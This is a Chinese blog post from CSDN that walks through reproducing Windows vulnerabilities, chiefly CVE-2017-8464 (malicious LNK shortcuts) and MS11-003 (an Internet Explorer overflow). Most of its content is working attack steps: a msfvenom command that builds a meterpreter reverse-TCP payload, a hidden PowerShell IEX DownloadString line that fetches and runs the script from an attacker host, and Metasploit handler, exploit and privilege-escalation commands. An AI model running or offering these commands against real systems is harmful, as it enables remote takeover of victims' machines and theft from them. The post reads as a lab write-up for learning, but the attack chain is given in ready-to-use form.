Windows系统组件漏洞

最新推荐文章于 2024-05-11 03:24:25 发布
最新推荐文章于 2024-05-11 03:24:25 发布
阅读量2.7k 收藏 2
点赞数 1
分类专栏: Windows 文章标签: windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45663905/article/details/108684389
版权

目录

什么是组件

组件一般都是系统自带都有的, 如:WINXPWIN2000它本身,就带有非常强大的组件功能。添加组件可以使系统的功能更加强大。
具体方式:

控制面板--添加或删除程序--添加/删除组件

1.CVE-2017-8464

原理

Windows系统使用二进制解析 .LNK文件,当恶意二进制代码被系统识别执行时即可实现远程代码执行,由于是在explorer.exe进程中运行,所以 load 进内存时与当前用户具有相同权限
在这里插入图片描述

复现

环境部署
msfvenom  -p   windows/x64/meterpreter/reverse_tcp  lhost=192.168.0.102   lport=5555  -f  psh-reflection>/opt/search.ps1   #生成shell反弹木马

mv  search.ps1  /var/www/html   #木马移动到/var/www/html

service apache2 start #启动服务

powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.0.102/search.ps1');test.ps1"    #创建快捷件远程加载
远程监听
use exploit/multi/handler  

set payload windows/x64/meterpreter/reverse_tcp  

show options  

set LHOST 192.168.0.102  

set lport  5555    

exploit

2.MS11_003 溢出漏洞

原理

溢出漏洞是由于程序中的某个或某些输入函数(使用者输入参数)对所接收数据的边界验证不严密而造成。
根据程序执行中堆栈调用原理,程序对超出边界的部分如果没有经过验证自动去掉,那么超出边界的部分就会覆盖后面的存放程序指针的数据,当执行完上面的代码,程序会自动调用指针所指向地址的命令。

复现

search ms11_003
use exploit/windows/browser/ms11_003_ie_css_import
set payload windows/meterpreter/reverse_tcp
set srvhost
set lhost 192.168.0.102
set uripath 00
Run
sessions
下一步提权
use  post/multi/recon/local_exploit_suggester
set LHOST 192.168.0.102
set SESSION 1
Exploit

3.CVE-2019-0708

可参考:
https://blog.csdn.net/yumengzth/article/details/102768945?utm_medium=distribute.pc_relevant.none-task-blog-title-7&spm=1001.2101.3001.4242

4.CVE-2020-0796(永恒之黑)

https://blog.csdn.net/PigLL/article/details/108012981

5.…………………………

ihszg
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
组件漏洞总结
qq_44806973的博客
11-18 1931
什么是web组件 我理解的组件主要分为: web服务器、web中间件和web容器 web服务器 Web服务器一般指网站服务器,是指驻留于因特网上某种类型计算机的程序,可以处理浏览器等Web客户端的请求并返回相应响应,也可以放置网站文件,让全世界浏览;可以放置数据文件,让全世界下载。目前最主流的三个Web服务器是Apache、 Nginx 、IIS。 WEB服务器也称为WWW(WORLD WIDE WEB)服务器 常用WEB服务器: IIS、Apache、nginx、tomcat、weblogic、websp
windows系统漏洞
larry的专栏
09-14 1100
漏洞名称:其他的计算机可以通过网络,以匿名方式获取到本机的信息相关描述:其他的计算机可以通过网络,以匿名方式获取到本机的信息提示:请谨慎选择此项,如果选择屏蔽匿名方式获取本机的信息,也将导致其他用户无法访问到本机的共享文件夹。恢复此设置需要操作注册表,变更[restrictanonymous]键值的数据为“0”。修改此安全级别的方法如下:运行 Regedit.exe 编辑注册表,定位到子健 H
在渗透测试中快速检测常见中间件、组件的高危漏洞_中间件的安全检查(4)
最新发布
2401_84562858的博客
05-11 561
网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长! 网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化的资料的朋友,可以戳这里获取一个人可
php组件漏洞
赵花花08042的博客
07-27 574
通常我们调用一个php中的方法,比如这样一个函数方法localAdd(10,20),localAdd方法的具体实现要么是用户自己定义的,要么是php库函数中自带的,也就说在localAdd方法的代码实现在本地,它是一个本地调用!3、B接受A发送过来的字节流,然后反序列化得到目标方法名,方法参数,接着执行相应的方法调用(可能是localAdd)并把结果30返回;扩展,按照官网的描述,可以安装也可以不安装,不安装phprpc也是可以运行的。然后就可以非常方便的去使用第三方的类库了,是不是感觉很棒啊!...
Windows漏洞
技术心得
12-28 2134
       最近发现windows 一个比较严重的漏洞,起源于C盘满了。工作电脑越来越慢。重装又不现实。后来发现个mklink命令。可以把原先装在C盘的应用程序目录直接移动到其它盘D或者E.然后用mklink命令在C盘原先位置和目标移动到位置建立连接。C盘空间清理了,也不影响原先安装程序使用。      问题出在我把原先安装到C盘的目录,移动到其它盘。为了避免以后在其它盘误认为是无用文件而删除...
框架/组件漏洞系列1:struts2漏洞汇总
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
12-03 9478
前言: 本篇文章中复现的漏洞不是特别全面,但是挑选了最近两年的漏洞进行复现,旨在对漏洞进行有用复现,毕竟一些老漏洞已经基本不存在了。 一、Struts简介 1、简介 基本介绍: Struts是Apache软件基金会(ASF)赞助的一个开源项目。它最初是Jakarta项目中的一个子项目,并在2004年3月成为ASF的顶级项目。它通过采用[Java Servlet](https://baike.baidu.com/item/Java Servlet)/JSP技术,实现了基于[Java EE](https://.
Windows系统漏洞ms12-020
qq_62683583的博客
11-14 318
用Kali主机攻击Windows系统漏洞ms12-020
Web安全之易受攻击和过时的组件漏洞详解及预防
路多辛的所思所想
02-06 849
易受攻击和过时的组件(Vulnerable and Outdated Components)类漏洞看名字就很容易理解,就是使用了具有已知漏洞组件或者已经过时的组件。由于过时的组件不再被维护,会被发现越来越多的安全漏洞但是漏洞也不会再被修复,就会带来极大的安全隐患。当然,这里的组件不是狭义的组件,可以指代码里面引用的三方库、应用程序、操作系统、数据库、服务器、Linux 内核等等。在被暴出漏洞的情况下或有新版本的情况下,没有及时修复或升级系统、框架或依赖库的版本。不清楚使用的组件和依赖的组件的版本。
Android 的提权 (Root) 原理是什么?
kenjili的博客
12-05 945
android内核剖析学习笔记:AMS(ActivityManagerService)内部原理和工作机制一、ActivityManagerService提供的主要功能: (1)统一调度各应用程序的Activity (2)内存管理 (3)进程管理 二、启动一个Activity的方式有以下几种: (1)在应用程序中调用startActivity启动指定的Activit
windows的桌面安全漏洞
weixin_45574151的博客
06-01 488
Microsoft Windows 远程桌面服务远程执行代码漏洞(CVE-2019-0708)【原理扫描】 受影响主机:
Windows 用户怒了!系统漏洞简直泛滥成灾
CSDN资讯
05-14 3696

 
 
 
 
 
 
 点击上方“CSDN”,选择“置顶公众号”关键时刻,第一时间送达!还记得去年被 WannaCry 勒索...
windows命令执行漏洞
linxaiomo
04-09 640
原理:命令执行漏洞是指应用有时需要调用一些执行系统命令的函数,如:system()、exec()、shell_exec()、eval()、passthru()等函数,代码未对用户可控参数做过滤,当用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击。 环境搭建:phpstudy,windows10 windows的IP地址(ipconfig查看):10.250.70.219 打开pupstudyd的网站目录 在网站根目录下面新建文件夹command,在新.
Windows 2000漏洞集锦
morningbird的专栏
07-24 2673
Windows 2000漏洞集锦2001-07-18 00:01:10· ·苗得雨··yesky1 2 3 4 5  下一页  对于Windows 2000的强大的功能和全新的构架我们都不得不叹服微软的实力,可以预见Windows 2000将成为新一代服务器操作系统的主流,同时也成为黑客攻击的对象。但是由于新的Windows2000的全新构架很大程度都依赖于Active Direc
系统漏洞基础知识
qq_30683393的博客
05-15 5844
系统漏洞基础知识 系统漏洞也称安全缺陷,这些安全缺陷会被技术高的不等的入侵者所利用,从而达到控制目标主机或造成一些更具破坏性的目的。 系统漏洞概述 技术所有操作系统的默认安装(Default installation)都没有被配置成最理想的安全状态,即出现了漏洞漏洞是指应用软件或操作系统软件在逻辑设计上的缺陷,或在编写时产生的错误。某个程序(包括操作系统)在设计时未考虑周全,则这个错误或缺陷将可...
组件安全以及漏洞复现
weixin_58954236的博客
09-08 893
组件(例如:库、框架和其他软件模块)拥有和应用程序相同的权限。如果应用程序中含有已知漏洞组件被攻击者利用,可能会造成严重的数据丢失或服务器接管。同时,使用含有已知漏洞组件的应用程序和API 可能会破坏应用程序防御、造成各种攻击并产生严重影响。
总结分析组件漏洞产生的原理
qq_53058639的博客
01-04 228
Coherence 组件是 WebLogic 中的一个核心组件,内置在 WebLogic 中。近些年,weblogic Coherence 组件反序列化漏洞被频繁爆出,苦于网上没有公开对 weblogic Coherence 组件历史反序列化漏洞的总结,导致很多想入门或者了解 weblogic Coherence 组件反序列化漏洞的朋友不知道该怎么下手,于是本文便对 weblogic Coherence 组件历史反序列化漏洞做出了一个总结和分析。
开源组件安全风险及应对
INSBUG的博客
03-05 1669
这里的开源组件指的是以开源许可证发布的软件组件、库、框架和工具等,组件的源代码是公开的,而根据不同的许可协议,版权所有者可以授予用户使用、研究、更改和分发软件及其源代码的权力。1703个代码库中,54%的代码库有开源协议冲突,31%的代码库包含没有协议或自定义协议的开源代码,89%的代码库包含超过4年以上未更新的开源代码,91%的代码库包含过去2年未更新的组件,84%的代码库包含至少一个开源漏洞,5%的代码库包含有漏洞的Log4J版本,11%的Java代码库包含有漏洞的Log4J版本。
CVE_2020_0796重大windows SMB RCE漏洞
weixin_39811856的博客
03-13 505
描述如下: 漏洞是因为操作系统在处理SMBv3协议中的压缩数据包时存在错误处理。 成功构造数据包的攻击者可在远程无验证的条件下利用该漏洞执行任意代码。 易被感染系统: + Windows 10 Version 1903 for 32-bit Systems + Windows 10 Version 1903 for ARM64-based Systems + Windows 1...
GDI漏洞利用:Windows内核的安全挑战
此外,还提到了Windows操作系统和内核的安全缓解机制,如DEP、ASLR、CFG等,以及内核级别的防御技术如SecureBoot、KCFG等。文章引用了一篇名为《WindowsKernelExploitation:ThisTimeFonthuntyoudownin4bytes》的研究...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值